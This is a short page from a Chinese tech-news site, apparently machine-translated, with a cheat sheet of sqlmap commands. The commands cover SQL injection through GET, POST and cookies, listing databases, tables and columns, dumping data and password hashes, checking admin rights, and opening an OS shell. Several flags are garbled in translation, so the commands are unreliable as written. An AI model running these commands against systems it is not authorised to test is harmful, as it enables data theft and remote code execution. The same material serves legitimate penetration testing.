Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

Sqlmap command

2025-01-18 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Share

Shulou(Shulou.com)06/01 Report--

SQLMAP

Injection of sqlmap.py-u "URL" in GET mode

POST injection sqlmap.py-u "URL"-- data "POST parameter = POST value"

COOKIE injection sqlmap.py-u "URL"-- cookie "cookies value"

Burst database name (cookie according to the actual situation) sqlmap.py-u "URL" [--cookie "cookies value"]-- dbs

Explode the table sqlmap.py-u "URL" [--cookie "cookies value"]-D database name-tables in the target database

Burst target data table field sqlmap.py-u "URL" [--cookie "cookies value"]-D database name-T table name-columns

Export the data of the target field sqlmap.py-u "URL" [--cookie "cookies value"]-D database name-T table name-C field name of the data to be exported, separated by commas-- dump

Reveal how much data there is in the target database sqlmap.py-u "URL" [--cookie "cookies value"]-D database name-count

Detect the current user sqlmap.py-u "URL" [--cookie "cookies value"]-- current-user

Check whether the current user is an administrator sqlmap.py-u "URL" [--cookie "cookies value"]-- is-dba

Detect database user sqlmap.py-u "URL" [--cookie "cookies value"]-- user-v 0

Detect the database user password sqlmap.py-u "URL" [--cookie "cookies value"]-- password-v 0

Detect the current database sqlmap.py-u "URL" [--cookie "cookies value"]-- current-db

Multithreading-threading 5

If we are administrators, we can write Shell.

Operating system Shell write

Sqlmap.py-u "URL" [--cookie "cookies value"]-- os-shell

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report